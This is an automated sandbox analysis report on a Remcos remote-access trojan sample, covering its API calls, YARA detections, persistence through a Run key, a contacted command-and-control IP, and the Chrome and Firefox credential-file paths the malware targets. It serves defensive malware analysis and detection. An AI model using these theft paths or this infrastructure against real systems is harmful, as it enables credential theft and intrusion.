Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	15_2_007821B7
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	15_2_00782202
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	15_2_0078229D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	15_2_0078257A
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	15_2_0077866B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_007826A3
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	15_2_007827AA
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_00782877
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	15_2_00778B54
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoA,	15_2_0073FB38
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_00781F3F
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	20_2_00452036
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	20_2_004520C3
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	20_2_00452313
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	20_2_00448404
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	20_2_0045243C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	20_2_00452543
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	20_2_00452610
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoA,	20_2_0040F8D1
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	20_2_004488ED
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	20_2_00451CD8
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	20_2_00451F50
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	20_2_00451F9B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	20_2_01FD21B7
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	20_2_01FD229D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	20_2_01FD2202
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	20_2_01FD257A
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	20_2_01FD27AA
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	20_2_01FD26A3
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	20_2_01FC866B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	20_2_01FD2877
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	20_2_01FC8B54
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoA,	20_2_01F8FB38
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	20_2_01FD1F3F

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0040B164 GetLocalTime,wsprintfW,

0_2_0040B164

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0041B60D GetComputerNameExW,GetUserNameW,

0_2_0041B60D

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_00449190

Source: C:\Users\user\AppData\Roaming\yavascript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2513171339.000000000086C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2463964388.000000000061C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409616641.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474688472.0000000000598000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ltlbVjClX9.exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 6772, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	0_2_0040BA12
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	15_2_0040BA12
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	20_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	0_2_0040BB30
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: \key3.db	0_2_0040BB30
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	15_2_0040BB30
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: \key3.db	15_2_0040BB30
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	20_2_0040BB30
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: \key3.db	20_2_0040BB30

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0ZPVF8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0ZPVF8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0ZPVF8
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0ZPVF8

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2513171339.000000000086C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2463964388.000000000061C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409616641.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474688472.0000000000598000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ltlbVjClX9.exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 6772, type: MEMORYSTR

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: cmd.exe	0_2_0040569A
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: cmd.exe	15_2_0040569A
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: cmd.exe	20_2_0040569A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Bypass User Account Control	3 Obfuscated Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	12 Software Packing	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Windows Service	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Process Injection	1 Bypass User Account Control	LSA Secrets	23 System Information Discovery	SSH	Keylogging	1 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	141 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	2 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ltlbVjClX9.exe	76%	ReversingLabs	Win32.Backdoor.Remcos
ltlbVjClX9.exe	47%	Virustotal		Browse
ltlbVjClX9.exe	100%	Avira	HEUR/AGEN.1318110
ltlbVjClX9.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\yavascript.exe	76%	ReversingLabs	Win32.Backdoor.Remcos
C:\Users\user\AppData\Roaming\yavascript.exe	47%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
198.23.227.212	0%	Avira URL Cloud	safe
198.23.227.212	15%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
198.23.227.212	true	15%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	yavascript.exe	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.4.dr	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gp/C	ltlbVjClX9.exe, 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, ltlbVjClX9.exe, 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, ltlbVjClX9.exe, 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.23.227.212	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1486709
Start date and time:	2024-08-02 13:51:24 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ltlbVjClX9.exe renamed because original name is a hash value
Original Sample Name:	9e91474ce4c72005469f0884b6942940e1cecee9bf425fd2739a359ca3299c5f.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@19/63@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 13 Number of non-executed functions: 396
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.89.179.12
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:52:51	API Interceptor	1x Sleep call for process: WerFault.exe modified
07:53:17	API Interceptor	2710344x Sleep call for process: yavascript.exe modified
13:52:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-0ZPVF8 "C:\Users\user\AppData\Roaming\yavascript.exe"
13:52:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-0ZPVF8 "C:\Users\user\AppData\Roaming\yavascript.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	9FepQDeZbh.elf	Get hash	malicious	Unknown	Browse	192.210.197.207
	p2StQYQ4ck.exe	Get hash	malicious	Vidar	Browse	198.46.178.145
	CQgbkZoMUK.rtf	Get hash	malicious	Remcos	Browse	107.173.192.135
	ZN1dWTRbt3.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.3.179.145
	comprobante.xlam.xlsx	Get hash	malicious	Unknown	Browse	192.3.101.135
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	192.3.101.141
	POSH20240801.xls	Get hash	malicious	Unknown	Browse	107.173.192.135
	REVISED UPDATE424 PO.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.3.179.145
	PO-00349.xls	Get hash	malicious	Remcos	Browse	192.3.101.142
	Env#U00edo de Orden de Compra No. 00501._56895687906875768568596.exe	Get hash	malicious	GuLoader	Browse	192.3.216.142

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_7fc1edef-822f-454c-ad26-4e564dc8aa5b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9518016926321414
Encrypted:	false
SSDEEP:	192:/rg5H/f056rAjsAZrZ4zuiFJZ24IO8LP:/rg5H/M56rAjSzuiFJY4IO8LP
MD5:	312CE311CE89ABA57759277249AEDF12
SHA1:	A9096F3F5C701964EA1099556A53203E9C91F083
SHA-256:	FE769A00F48DEACB3DFF10C1BBB74F7AF7F6D1A5306BF30682813A49E506AFAD
SHA-512:	6F5813B16A3503EE2D27EC24965D9994FB1822A0C4A040BA024C80467D556729892E420EE7AE47D3E56248282F2204EBE53B8F0789AAD5B657B4A40FC7324DDC
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.4.5.5.9.3.7.3.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.c.1.e.d.e.f.-.8.2.2.f.-.4.5.4.c.-.a.d.2.6.-.4.e.5.6.4.d.c.8.a.a.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.b.2.f.d.d.9.-.6.7.1.c.-.4.9.d.f.-.8.a.7.4.-.3.4.c.c.0.8.1.e.c.1.f.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.l.b.V.j.C.l.X.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.4.-.8.d.4.2.-.9.3.6.9.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.d.0.b.d.9.b.3.8.0.0.7.3.1.b.8.7.b.4.8.d.b.a.2.8.6.0.d.e.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_bd8c4617-4455-4ae8-aec7-7cdd8128e5c4\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9518717311974677
Encrypted:	false
